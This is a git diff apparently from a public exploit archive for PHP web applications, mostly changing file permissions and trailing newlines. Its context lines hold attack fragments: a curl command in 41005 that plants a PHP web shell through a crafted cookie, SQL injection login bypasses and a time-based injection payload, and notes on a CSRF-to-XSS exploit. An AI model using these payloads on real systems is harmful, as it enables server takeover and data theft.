a/platforms/php/webapps/40396.txt b/platforms/php/webapps/40396.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40401.txt b/platforms/php/webapps/40401.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40403.txt b/platforms/php/webapps/40403.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4041.htm b/platforms/php/webapps/4041.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40412.txt b/platforms/php/webapps/40412.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40413.txt b/platforms/php/webapps/40413.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40414.txt b/platforms/php/webapps/40414.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40416.txt b/platforms/php/webapps/40416.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40423.txt b/platforms/php/webapps/40423.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40454.txt b/platforms/php/webapps/40454.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40466.txt b/platforms/php/webapps/40466.txt old mode 100755 new mode 100644 index 8a8a0b806..592b52d71 --- a/platforms/php/webapps/40466.txt +++ b/platforms/php/webapps/40466.txt @@ -57,4 +57,4 @@ Parameter: newid (GET) [x]========================================================================================================================================[x] | Hi All long time no see ^_^ -[x]========================================================================================================================================[x] \ No newline at end of file +[x]========================================================================================================================================[x] \ No newline at end of file diff --git a/platforms/php/webapps/40467.txt b/platforms/php/webapps/40467.txt old mode 100755 new mode 100644 index 182840b01..09479622d --- a/platforms/php/webapps/40467.txt +++ b/platforms/php/webapps/40467.txt @@ -58,4 +58,4 @@ Parameter: refid (GET) [x]========================================================================================================================================[x] | Hi All long time no see ^_^ -[x]========================================================================================================================================[x] \ No newline at end of file +[x]========================================================================================================================================[x] \ No newline at end of file diff --git a/platforms/php/webapps/40468.txt b/platforms/php/webapps/40468.txt old mode 100755 new mode 100644 index 95084f4dc..6aa9e1198 --- a/platforms/php/webapps/40468.txt +++ b/platforms/php/webapps/40468.txt @@ -58,4 +58,4 @@ Parameter: pid (GET) [x]========================================================================================================================================[x] | Hi All long time no see ^_^ -[x]========================================================================================================================================[x] \ No newline at end of file +[x]========================================================================================================================================[x] \ No newline at end of file diff --git a/platforms/php/webapps/40469.txt b/platforms/php/webapps/40469.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40470.txt b/platforms/php/webapps/40470.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40475.txt b/platforms/php/webapps/40475.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40479.txt b/platforms/php/webapps/40479.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40480.txt b/platforms/php/webapps/40480.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40481.txt b/platforms/php/webapps/40481.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40486.txt b/platforms/php/webapps/40486.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40487.txt b/platforms/php/webapps/40487.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40492.html b/platforms/php/webapps/40492.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40493.html b/platforms/php/webapps/40493.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40495.html b/platforms/php/webapps/40495.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40496.html b/platforms/php/webapps/40496.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40505.txt b/platforms/php/webapps/40505.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40506.html b/platforms/php/webapps/40506.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40511.txt b/platforms/php/webapps/40511.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40512.txt b/platforms/php/webapps/40512.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40513.txt b/platforms/php/webapps/40513.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40516.txt b/platforms/php/webapps/40516.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40517.html b/platforms/php/webapps/40517.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40518.txt b/platforms/php/webapps/40518.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40519.txt b/platforms/php/webapps/40519.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40521.txt b/platforms/php/webapps/40521.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40526.txt b/platforms/php/webapps/40526.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40527.txt b/platforms/php/webapps/40527.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40529.txt b/platforms/php/webapps/40529.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40530.txt b/platforms/php/webapps/40530.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40531.txt b/platforms/php/webapps/40531.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40532.html b/platforms/php/webapps/40532.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40534.html b/platforms/php/webapps/40534.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4054.php b/platforms/php/webapps/4054.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40542.txt b/platforms/php/webapps/40542.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40543.txt b/platforms/php/webapps/40543.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40544.txt b/platforms/php/webapps/40544.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40545.txt b/platforms/php/webapps/40545.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40546.txt b/platforms/php/webapps/40546.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40547.txt b/platforms/php/webapps/40547.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4055.htm b/platforms/php/webapps/4055.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40552.txt b/platforms/php/webapps/40552.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40553.txt b/platforms/php/webapps/40553.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40554.txt b/platforms/php/webapps/40554.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40555.txt b/platforms/php/webapps/40555.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40557.html b/platforms/php/webapps/40557.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40558.txt b/platforms/php/webapps/40558.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40559.txt b/platforms/php/webapps/40559.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40575.html b/platforms/php/webapps/40575.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40576.py b/platforms/php/webapps/40576.py index 3a1c6b95e..b3a15608b 100755 --- a/platforms/php/webapps/40576.py +++ b/platforms/php/webapps/40576.py @@ -70,4 +70,4 @@ def xhpcsrf(): print(" [+] Further Details:\n [!] The code saved in %s will automatically submit without\n any user interaction\n [!] To fully exploit, send the admin of this site a webpage with\n the above code injected in it, when he/she will open it the\n title of their website will be\n changed to an XSS payload, and then\n go to %s and hit ALT+SHIFT+Z on your keyboard, boom! XSS will pop-up!") %(filename, url) print("") -xhpcsrf() \ No newline at end of file +xhpcsrf() \ No newline at end of file diff --git a/platforms/php/webapps/40584.txt b/platforms/php/webapps/40584.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4059.txt b/platforms/php/webapps/4059.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40591.txt b/platforms/php/webapps/40591.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40594.txt b/platforms/php/webapps/40594.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40595.txt b/platforms/php/webapps/40595.txt old mode 100755 new mode 100644 index dbb36590c..17c97773e --- a/platforms/php/webapps/40595.txt +++ b/platforms/php/webapps/40595.txt @@ -84,4 +84,4 @@ The vulnerable code is located in the `argumenter_inclure` function (`ecrire/pub * Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com) --- SYSDREAM Labs <labs@sysdream.com> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ * Twitter: @sysdream \ No newline at end of file +-- SYSDREAM Labs <labs@sysdream.com> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ * Twitter: @sysdream \ No newline at end of file diff --git a/platforms/php/webapps/40596.txt b/platforms/php/webapps/40596.txt old mode 100755 new mode 100644 index c88a8c90a..fca8a49c0 --- a/platforms/php/webapps/40596.txt +++ b/platforms/php/webapps/40596.txt @@ -92,4 +92,4 @@ File names are stored in `$res` and displayed by `echo` on line 146 : * Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com) --- SYSDREAM Labs <labs@sysdream.com> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ * Twitter: @sysdream \ No newline at end of file +-- SYSDREAM Labs <labs@sysdream.com> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ * Twitter: @sysdream \ No newline at end of file diff --git a/platforms/php/webapps/40597.txt b/platforms/php/webapps/40597.txt old mode 100755 new mode 100644 index ffdf7540d..55649c9c1 --- a/platforms/php/webapps/40597.txt +++ b/platforms/php/webapps/40597.txt @@ -45,4 +45,4 @@ The vulnerable request to `valider_xml` (see: *SPIP 3.1.2 Template Compiler/Comp * Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com) --- SYSDREAM Labs <labs@sysdream.com> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ * Twitter: @sysdream \ No newline at end of file +-- SYSDREAM Labs <labs@sysdream.com> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ * Twitter: @sysdream \ No newline at end of file diff --git a/platforms/php/webapps/40612.txt b/platforms/php/webapps/40612.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40620.txt b/platforms/php/webapps/40620.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4063.txt b/platforms/php/webapps/4063.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40631.txt b/platforms/php/webapps/40631.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40637.txt b/platforms/php/webapps/40637.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4064.txt b/platforms/php/webapps/4064.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40641.txt b/platforms/php/webapps/40641.txt old mode 100755 new mode 100644 index 6eacbe37b..014720836 --- a/platforms/php/webapps/40641.txt +++ b/platforms/php/webapps/40641.txt @@ -232,4 +232,4 @@ Line 96: Cross-Site Scripting (XSS) in 'echo' via '$Page' ----------------------------------------------------- Scan finished. Check results in scan_output.txt file. -lqwrm@zslab:~# \ No newline at end of file +lqwrm@zslab:~# \ No newline at end of file diff --git a/platforms/php/webapps/40642.txt b/platforms/php/webapps/40642.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40644.txt b/platforms/php/webapps/40644.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40645.txt b/platforms/php/webapps/40645.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40646.txt b/platforms/php/webapps/40646.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40650.txt b/platforms/php/webapps/40650.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40671.txt b/platforms/php/webapps/40671.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40676.txt b/platforms/php/webapps/40676.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4068.txt b/platforms/php/webapps/4068.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40682.txt b/platforms/php/webapps/40682.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40683.txt b/platforms/php/webapps/40683.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40684.txt b/platforms/php/webapps/40684.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4069.txt b/platforms/php/webapps/4069.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40692.html b/platforms/php/webapps/40692.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40698.py b/platforms/php/webapps/40698.py index 6b7e25609..6e475b776 100755 --- a/platforms/php/webapps/40698.py +++ b/platforms/php/webapps/40698.py @@ -71,4 +71,4 @@ with session() as r: print('[+] Exploit By Ehsan Hosseini') else: print("[-] Error in Exploting...") - pass \ No newline at end of file + pass \ No newline at end of file diff --git a/platforms/php/webapps/4070.txt b/platforms/php/webapps/4070.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40700.html b/platforms/php/webapps/40700.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40701.html b/platforms/php/webapps/40701.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40705.html b/platforms/php/webapps/40705.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40706.txt b/platforms/php/webapps/40706.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40707.html b/platforms/php/webapps/40707.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40708.html b/platforms/php/webapps/40708.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4071.txt b/platforms/php/webapps/4071.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40716.py b/platforms/php/webapps/40716.py index aa9270bdf..4ba9eec14 100755 --- a/platforms/php/webapps/40716.py +++ b/platforms/php/webapps/40716.py @@ -65,4 +65,4 @@ with session() as r: if uploadfile.status_code == 200: print("[+] File Uploaded...") print("[+] URL : http://" + host + "/attachment/" + filename) - pass \ No newline at end of file + pass \ No newline at end of file diff --git a/platforms/php/webapps/40718.txt b/platforms/php/webapps/40718.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40719.txt b/platforms/php/webapps/40719.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4072.txt b/platforms/php/webapps/4072.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40723.txt b/platforms/php/webapps/40723.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40724.txt b/platforms/php/webapps/40724.txt old mode 100755 new mode 100644 index 9e65ec9d9..e16f24c1f --- a/platforms/php/webapps/40724.txt +++ b/platforms/php/webapps/40724.txt @@ -74,4 +74,4 @@ Vulnerability discovered by Egidio Romano. [-] Original Advisory: -http://karmainsecurity.com/KIS-2016-13 \ No newline at end of file +http://karmainsecurity.com/KIS-2016-13 \ No newline at end of file diff --git a/platforms/php/webapps/40725.txt b/platforms/php/webapps/40725.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40732.txt b/platforms/php/webapps/40732.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40733.txt b/platforms/php/webapps/40733.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4074.txt b/platforms/php/webapps/4074.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40746.php b/platforms/php/webapps/40746.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40749.txt b/platforms/php/webapps/40749.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4075.txt b/platforms/php/webapps/4075.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40750.txt b/platforms/php/webapps/40750.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40751.txt b/platforms/php/webapps/40751.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40753.php b/platforms/php/webapps/40753.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40755.html b/platforms/php/webapps/40755.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4076.php b/platforms/php/webapps/4076.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40770.txt b/platforms/php/webapps/40770.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40771.txt b/platforms/php/webapps/40771.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40772.txt b/platforms/php/webapps/40772.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40776.txt b/platforms/php/webapps/40776.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4078.php b/platforms/php/webapps/4078.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40782.txt b/platforms/php/webapps/40782.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40783.txt b/platforms/php/webapps/40783.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4079.txt b/platforms/php/webapps/4079.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40791.txt b/platforms/php/webapps/40791.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40795.html b/platforms/php/webapps/40795.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40800.txt b/platforms/php/webapps/40800.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40801.txt b/platforms/php/webapps/40801.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40802.txt b/platforms/php/webapps/40802.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40803.txt b/platforms/php/webapps/40803.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40804.txt b/platforms/php/webapps/40804.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40809.txt b/platforms/php/webapps/40809.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4081.php b/platforms/php/webapps/4081.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4084.txt b/platforms/php/webapps/4084.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4085.txt b/platforms/php/webapps/4085.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40850.txt b/platforms/php/webapps/40850.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40851.txt b/platforms/php/webapps/40851.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40852.txt b/platforms/php/webapps/40852.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40870.txt b/platforms/php/webapps/40870.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40877.txt b/platforms/php/webapps/40877.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40882.txt b/platforms/php/webapps/40882.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40892.txt b/platforms/php/webapps/40892.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40904.txt b/platforms/php/webapps/40904.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40908.html b/platforms/php/webapps/40908.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4091.txt b/platforms/php/webapps/4091.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40912.txt b/platforms/php/webapps/40912.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4092.txt b/platforms/php/webapps/4092.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40932.txt b/platforms/php/webapps/40932.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40934.html b/platforms/php/webapps/40934.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40939.txt b/platforms/php/webapps/40939.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40940.txt b/platforms/php/webapps/40940.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40941.txt b/platforms/php/webapps/40941.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4095.txt b/platforms/php/webapps/4095.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4096.php b/platforms/php/webapps/4096.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40966.txt b/platforms/php/webapps/40966.txt old mode 100755 new mode 100644 index 5b0f6c60f..fc5162715 --- a/platforms/php/webapps/40966.txt +++ b/platforms/php/webapps/40966.txt @@ -29,4 +29,4 @@ Proof of Concept SQL Injection PoC : -http://[Site]/[Path]/index.php?option=com_blog_calendar&modid=['SQLi] \ No newline at end of file +http://[Site]/[Path]/index.php?option=com_blog_calendar&modid=['SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/40968.php b/platforms/php/webapps/40968.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4097.txt b/platforms/php/webapps/4097.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40970.php b/platforms/php/webapps/40970.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40971.txt b/platforms/php/webapps/40971.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40972.php b/platforms/php/webapps/40972.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40973.txt b/platforms/php/webapps/40973.txt old mode 100755 new mode 100644 index 34c1708b9..69960ce19 --- a/platforms/php/webapps/40973.txt +++ b/platforms/php/webapps/40973.txt @@ -21,4 +21,4 @@ option=com_virtuemart&view=categorysearch' RLIKE (SELECT * FROM (SELECT(SLEEP(5) Update to version 2.6.1 from the update center of joomla. The Joomla vel publish the vulnerability on Answer from Joomla VEL "We have added it to the VEL here: https://vel.joomla.org/resolved/1897-aweb-cart-watching-system-2-6-0 -http://awebsupport.com/ \ No newline at end of file +http://awebsupport.com/ \ No newline at end of file diff --git a/platforms/php/webapps/40976.txt b/platforms/php/webapps/40976.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40979.php b/platforms/php/webapps/40979.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4098.php b/platforms/php/webapps/4098.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40987.txt b/platforms/php/webapps/40987.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4099.txt b/platforms/php/webapps/4099.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40997.txt b/platforms/php/webapps/40997.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40998.txt b/platforms/php/webapps/40998.txt old mode 100755 new mode 100644 index 72cd054bc..d0a21f78c --- a/platforms/php/webapps/40998.txt +++ b/platforms/php/webapps/40998.txt @@ -10,4 +10,4 @@ # Mail : ihsan[beygir]ihsan[nokta]net # # # # # # http://localhost/[PATH]/admin/login.php and set Username and Password to 'or''=' and hit enter. -# # # # # \ No newline at end of file +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/40999.txt b/platforms/php/webapps/40999.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4100.txt b/platforms/php/webapps/4100.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41001.txt b/platforms/php/webapps/41001.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41002.txt b/platforms/php/webapps/41002.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41004.txt b/platforms/php/webapps/41004.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41005.txt b/platforms/php/webapps/41005.txt old mode 100755 new mode 100644 index bac5aa8a5..57298a469 --- a/platforms/php/webapps/41005.txt +++ b/platforms/php/webapps/41005.txt @@ -33,5 +33,4 @@ without further or do this is a poc code curl -ks -m20 http://127.0.0.1/recordings/index.php" --cookie "ari_lang=() { :;};php -r 'set_time_limit(0);unlink("page.framework.php");file_put_contents("misc/audio.php", "<?php if(\$_COOKIE[\"lang\"]) {system(\$_COOKIE[\"lang\"]);}die();?>");';ari_auth=O:8:"DB_mysql":6:{s:19:"_default_error_mode";i:16;s:22:"_default_error_options";s:9:"do_reload";s:12:"_error_class";s:4:"TEST";s:13:"was_connected";b:1;s:7:"options";s:3:"123";s:3:"dsn";a:4:{s:8:"hostspec";s:9:"localhost";s:8:"username";s:4:"root";s:8:"password";s:0:"";s:8:"database";s:7:"trigger";}};elastixSession=716ratk092555gl0b3gtvt8fo7;UICSESSION=rporp4c88hg63sipssop3kdmn2;ARI=b8e4h6vfg0jouquhkcblsouhk0" --data "username=admin&password=admin&submit=btnSubmit" >/dev/null -if curl -ks -m10 "http://127.0.0.1/recordings/misc/audio.php" --cookie "lang=id" | grep asterisk >/dev/null;then echo "127.0.0.1/recordings/misc/audio.php" | tee -a xploited_new.txt;fi - \ No newline at end of file +if curl -ks -m10 "http://127.0.0.1/recordings/misc/audio.php" --cookie "lang=id" | grep asterisk >/dev/null;then echo "127.0.0.1/recordings/misc/audio.php" | tee -a xploited_new.txt;fi \ No newline at end of file diff --git a/platforms/php/webapps/41006.txt b/platforms/php/webapps/41006.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41007.html b/platforms/php/webapps/41007.html old mode 100755 new mode 100644 index f065465eb..1125ce2f5 --- a/platforms/php/webapps/41007.html +++ b/platforms/php/webapps/41007.html @@ -28,4 +28,4 @@ </form> </body> </html> -# # # # # \ No newline at end of file +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41009.txt b/platforms/php/webapps/41009.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41010.txt b/platforms/php/webapps/41010.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41011.txt b/platforms/php/webapps/41011.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4102.txt b/platforms/php/webapps/4102.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41023.txt b/platforms/php/webapps/41023.txt old mode 100755 new mode 100644 index aaaaab467..c36867557 --- a/platforms/php/webapps/41023.txt +++ b/platforms/php/webapps/41023.txt @@ -18,4 +18,4 @@ # E.t.c.... Other files, too. There are security vulnerabilities. # Category,User E.t.c.. Add/Edit/Delete There are security vulnerabilities. # -# # # # # \ No newline at end of file +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41024.txt b/platforms/php/webapps/41024.txt old mode 100755 new mode 100644 index 24d1b3477..4c8bc84d4 --- a/platforms/php/webapps/41024.txt +++ b/platforms/php/webapps/41024.txt @@ -16,4 +16,4 @@ # http://localhost/[PATH]/movie.php?f=[SQL] # E.t.c.... Other files, too. There are security vulnerabilities. # Category,User E.t.c.. Add/Edit/Delete There are security vulnerabilities. -# # # # # \ No newline at end of file +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41027.txt b/platforms/php/webapps/41027.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41028.txt b/platforms/php/webapps/41028.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41029.txt b/platforms/php/webapps/41029.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4103.txt b/platforms/php/webapps/4103.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41034.txt b/platforms/php/webapps/41034.txt old mode 100755 new mode 100644 index 7c60e332e..f3d6be902 --- a/platforms/php/webapps/41034.txt +++ b/platforms/php/webapps/41034.txt @@ -14,4 +14,4 @@ # SQL Injection/Exploit : # http://localhost/[PATH]//notice-edit.php?aid=[SQL] # E.t.c.... Other files, too. There are security vulnerabilities. -# # # # # \ No newline at end of file +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41035.txt b/platforms/php/webapps/41035.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41036.txt b/platforms/php/webapps/41036.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41037.txt b/platforms/php/webapps/41037.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41038.txt b/platforms/php/webapps/41038.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4104.txt b/platforms/php/webapps/4104.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41043.txt b/platforms/php/webapps/41043.txt old mode 100755 new mode 100644 index f27e66189..ab5ba2b85 --- a/platforms/php/webapps/41043.txt +++ b/platforms/php/webapps/41043.txt @@ -9,4 +9,4 @@ # Mail : ihsan[beygir]ihsan[nokta]net # # # # # # http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter. -# # # # # \ No newline at end of file +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41044.txt b/platforms/php/webapps/41044.txt old mode 100755 new mode 100644 index 5dca3da8a..8c0187715 --- a/platforms/php/webapps/41044.txt +++ b/platforms/php/webapps/41044.txt @@ -26,4 +26,4 @@ # http://localhost/[PATH]/admin/photo.php # http://localhost/[PATH]/admin/googleads.php # http://localhost/[PATH]/admin/reports.php -# # # # # \ No newline at end of file +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41045.txt b/platforms/php/webapps/41045.txt old mode 100755 new mode 100644 index e1358bc52..94bdc05f3 --- a/platforms/php/webapps/41045.txt +++ b/platforms/php/webapps/41045.txt @@ -9,4 +9,4 @@ # Mail : ihsan[beygir]ihsan[nokta]net # # # # # # http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter. -# # # # # \ No newline at end of file +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41046.txt b/platforms/php/webapps/41046.txt old mode 100755 new mode 100644 index 02c652e0f..7e004c82f --- a/platforms/php/webapps/41046.txt +++ b/platforms/php/webapps/41046.txt @@ -9,4 +9,4 @@ # Mail : ihsan[beygir]ihsan[nokta]net # # # # # # http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter. -# # # # # \ No newline at end of file +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41047.txt b/platforms/php/webapps/41047.txt old mode 100755 new mode 100644 index 